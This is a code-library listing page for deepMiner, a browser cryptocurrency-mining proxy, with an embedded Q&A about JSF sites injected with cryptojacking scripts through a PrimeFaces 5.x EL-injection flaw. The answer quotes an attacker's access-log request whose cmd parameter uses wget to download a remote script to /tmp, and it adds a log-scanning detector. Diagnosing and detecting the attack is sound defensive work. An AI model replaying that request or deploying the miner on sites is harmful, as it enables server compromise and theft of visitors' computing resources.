deepMiner | deepMiner webminer proxy | Binary Executable Format library

 by deepwn | C | Version: Current | License: Non-SPDX

kandi X-RAY | deepMiner Summary

deepMiner is a C library typically used in Programming Style and Binary Executable Format applications. deepMiner has no bugs, it has no vulnerabilities and it has low support. However, deepMiner has a Non-SPDX License. You can download it from GitHub.

deepMiner webminer proxy (update for cryptoNight R)
            kandi-support Support

              deepMiner has a low active ecosystem.
              It has 510 star(s) with 232 fork(s). There are 60 watchers for this library.
              It had no major release in the last 6 months.
              There are 0 open issues and 74 have been closed. On average issues are closed in 30 days. There are no pull requests.
              It has a neutral sentiment in the developer community.
              The latest version of deepMiner is current.

            kandi-Quality Quality

              deepMiner has no bugs reported.

            kandi-Security Security

              deepMiner has no vulnerabilities reported, and its dependent libraries have no vulnerabilities reported.

            kandi-License License

              deepMiner has a Non-SPDX License.
              Non-SPDX licenses can be open source with a non SPDX compliant license, or non open source licenses, and you need to review them closely before use.

            kandi-Reuse Reuse

              deepMiner releases are not available. You will need to build from source code and install.
              Installation instructions, examples and code snippets are available.

            deepMiner Key Features

            No Key Features are available at this moment for deepMiner.

            deepMiner Examples and Code Snippets

            No Code Snippets are available at this moment for deepMiner.

            Community Discussions

            Trending Discussions on deepMiner

            QUESTION

            JSF Cryptojacking Malware
            Asked 2018-Jan-20 at 10:09

            Now I know this is not a security or malware removal website. However, I feel that this is a JSF-specific question.

            I have noticed that my website is being attacked constantly by injecting a JavaScript file into the web page.

            The malware is loading a script file from some random URL that has the following pattern: https://johndi33.*****.***:7777/deepMiner.js.

            The malware is removed upon redeployment of the app, however after some hours the attack is reinitiated and the script is injected.

            Upon some research about this specific cryptojacking malware I found hundreds or thousands of infected websites with the same malware, and I also noticed that all infected websites are JSF based.

            I wonder if there is any awareness about this, or any JSF misconfigurations that would lead to RCE that easily.

            PS - Environment:

            • Ubuntu 16.04

            • Wildfly 10.1

            • Java 8

            ...

            ANSWER

            Answered 2018-Jan-20 at 10:09

            There are no remote code execution vulnerabilities in JSF (Mojarra). See also its CVE summary which lists only an XSS bug in the prehistoric pre-1.2_08 versions.

            Only in PrimeFaces 5.x there was an EL injection hole in the resource handler behind the StreamedContent, the /dynamiccontent.properties. This EL injection hole allowed the attacker to execute code on the server machine. See also its CVE summary which lists exactly this vulnerability. Your question history confirms that you're using PrimeFaces.

            This was already fixed in February 2016 as per PrimeFaces issue 1152 and the fix is available since PrimeFaces 5.2.21 / 5.3.8 / 6.0. In other words, just continuously keep your software up to date.

            That said, this could also easily have been nailed down by analyzing server access logs. Below is an example log entry whereby this vulnerability is being exploited. Note particularly the extraordinarily long pfdrid request parameter and the cmd request parameter in a /dynamiccontent.properties request:

            GET /javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=4ib88tY5cy3INAZZsdtHPFU0Qzf8xqfq7ScCVr132r36qawXCNDixKdRFB0XZvCTU9npUitDjk1QTkIeQJA4yEY72QT3qDGJpZjuqCDIWniQcr2vJZR%2B005iFZzJ%2Fi7VR9Mx5l5cedTgq9wS03rem26ubch9%2Bq4W6msPwJ1hk0KMefG9yZl3o5nYeA5gvnp9LQJb3r%2BM1yQ00zFBDzT4i9Nsx%2Fs5eaGsq9BFptosdH06iT1k7rn%2BrQtPjyIbOQzOmnMx%2F6THLsOCppRaIG7BW4VRbsIi1gJ8cRh6%2Bad71ukPWbDdM6S6O0Qcr%2FdkssHfL5%2F7y8Xy%2FcyDiiljeZj3dIibq3CSy6RBaZGzRXqjYAyV%2FJ7n3ulIkSVKszrCy3VyWb1uCY0fKLrPd3EO%2Flsw3k%2FbYSofV9MA%2BAaTnD8PXYhmiYGvp9b2R1BQGb8WgFk0fyTITJFZfUTJhM%2BiRJruw9ALDox8MY9S0SnpbmXM3LQmVYSghH0j4Zgi7Te7SZZK6gqgZEkrTA%2BQgAaZRIFG6R810xr5PZoWWG0Fdf9x491vRYtUSet8xCHIofPZ7fS5uP3mi2btGxWy8TgAEyC2wT%2F19mudycgOdTXW9nMt5nOf62fOdKSBYs2jStSwe2a6I6N5Bzp0Z7sdiJ0gmrHiYoJlkyT7p0wWGEk5Q4Xe1EPWIwGZIOr43j6BE7HUP5%2F7KdejsAQzNZZr1ox99VhH1TYwRuH7A7%2BN%2FWheWQCn%2FEM0xlpXC4GssZp4xPVah%2BP9wNH054upTkx4jH8j4houh2UfrjM9Vn18J%2BC1inTqHliDnzu9LFrm5L88eHCnLNDf6cyNmIaom7o2hEoNcffVMJ%2FhWkW7XwVkNS2b0%2B%2B1ZgQXCd7QE0dpIujuJ79keSD1cUyGdgKCVx70vtcbAcfa07Yt3DBPzeIP%2FLQjU6%2F%2BEwTS3oy4gttmMReFb7Bmn0uOUsmGZ%2FKkJNyWwN3wlsEfNFJzLx8%2FtCWjroQVWR0xS0ZudruYXAFmmi9O5iPYjyyQCH8JUrzR4N9vyWffKq1THVtN21EvX7x87Xl908kTe79uh6J61ICVo0PABqIl87m1n7te3d3pZ72PCXetr7GcaElzna95Nfoix9pwJ6GWAjRTcGNPT67lMx7cYKXmTD0mQAzXvlgWi2yEzFt9NA0NFhhZ4m6UeRZ7%2Bgs1Rr0HMpPu%2FNIvaCjTyZRdqRyxrDQ%2FF2QCTxpVEWKYWEEV2t6g%2BQ2m3Xo%2ByyWgeDbY8mHmwkdYUKO3QtwYxXtXTKT9dwCRtE1wDsYjLN0wMdSrg4YX3jCYlt7kV%2FymlnhNoSnVQoDJeumsGI1%2BdmKu2AJY8sGqXo2PJd10CxpQSO6D4F7RxA8fQji8shFybjhRek0YiEXxmvnhsBzCkBCXWguA7RXsMGLrerXVD1wHo5Jf7wQmLOyKUH7nne9ezwzVdQnaqadFehgZ6a6f5d%2FfxIRUZ1tKeLPST16CBlY0%2BPsRQDJJwWrRXdpuwon4PzHQXLD%2BAhQ%2F8j9Mb0OTM8RdZLuRjXw7tcY4muQDwMRCb92ipMiorDO8jVwPPOAXc5waNbSGmRhzOW1%2BLsQpV8OEMKVMDXq5dRoYKz6tlH0Zh4eZTHED3hK8z4cukSTXuxFpdC5NjiVsyhQU71J87Tvkzw1HxbjqhJK%2BkoPySJCmpHOmrrsbNlp0kHtNHuhY&cmd=wget%20http://XXX.XXX.XXX.XXX/CONTACT/test.py%20-O%20/tmp/test.py%20--no-check-certificate HTTP/1.1" 200 1 
"-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0"

            The pfdrid request parameter normally represents the encrypted value of an EL expression which references a bean property returning the StreamedContent, such as #{bean.image}. However, due to the weak encryption vulnerability (open source 8-byte salt), the attacker can easily supply any arbitrary encrypted string and successfully get it decrypted and finally EL-evaluated.

            When the PrimeFaces 5.x StreamedContentHandler decrypts the above supplied pfdrid example, then the resulting string before EL-evaluation is as below (newlines added for readability):

            Source https://stackoverflow.com/questions/48314621
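
            The access-log check described in the answer above, as an added example (not part of the original answer and not PrimeFaces code): it flags requests to dynamiccontent.properties whose pfdrid is unusually long or that carry a cmd parameter. The 128-character threshold, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+"')
RESOURCE = "/javax.faces.resource/dynamiccontent.properties"
PFDRID_MAX = 128  # assumed threshold; tune it against your own legitimate traffic


def inspect_line(line):
    """Return the reasons a log line matches the pattern from the answer, or []."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    # 'in' rather than '==' so prefix (/faces/...) and suffix (.xhtml) mappings match
    if RESOURCE not in url.path:
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = []
    pfdrid = params.get("pfdrid", [""])[0]
    if len(pfdrid) > PFDRID_MAX:
        reasons.append(f"pfdrid length {len(pfdrid)} exceeds {PFDRID_MAX}")
    if "cmd" in params:
        reasons.append("cmd parameter present on a resource request")
    return reasons


def scan(lines):
    """Return (line_number, reasons) for every suspicious line, numbered from 1."""
    hits = []
    for number, line in enumerate(lines, start=1):
        reasons = inspect_line(line)
        if reasons:
            hits.append((number, reasons))
    return hits


# Constructed sample lines (documentation addresses, placeholder values).
_BASE = "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces"
SAMPLE_LOG = [
    f'203.0.113.5 - - [20/Jan/2018:09:00:00 +0000] "GET {_BASE}&pfdrid={"a" * 24} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'198.51.100.9 - - [20/Jan/2018:09:01:00 +0000] "GET {_BASE}&pfdrid={"A" * 1500}&cmd=PLACEHOLDER HTTP/1.1" 200 1 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Jan/2018:09:02:00 +0000] "GET /index.xhtml HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: " + "; ".join(reasons))
```

            Access logs only record the query string, so parameters sent in a POST body will not be visible to this check.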

            Community Discussions, Code Snippets contain sources that include Stack Exchange Network

            Vulnerabilities

            No vulnerabilities reported

            Install deepMiner

            lib request: *nodejs / *npm / ?nginx. ssl support: https://certbot.eff.org/ / https://acme.sh/. OS tested on: ubuntu(debian).

            Support

            All coins that follow cryptoNight / cryptoNight v7 & v8 / cryptoNight R and whose pools connect over JSONRPC2.
            Some coins that use cryptoNote: https://cryptonote.org/coins/ (example: Monero / Electroneum / Sumokoin / Aeon ...)
            The whitepaper: cryptoNight.txt and cryptoNight.md, from https://cryptonote.org/standards/
            Technology: https://cryptonote.org/inside/

            CLONE
          • HTTPS

            https://github.com/deepwn/deepMiner.git

          • CLI

            gh repo clone deepwn/deepMiner

          • sshUrl

            git@github.com:deepwn/deepMiner.git
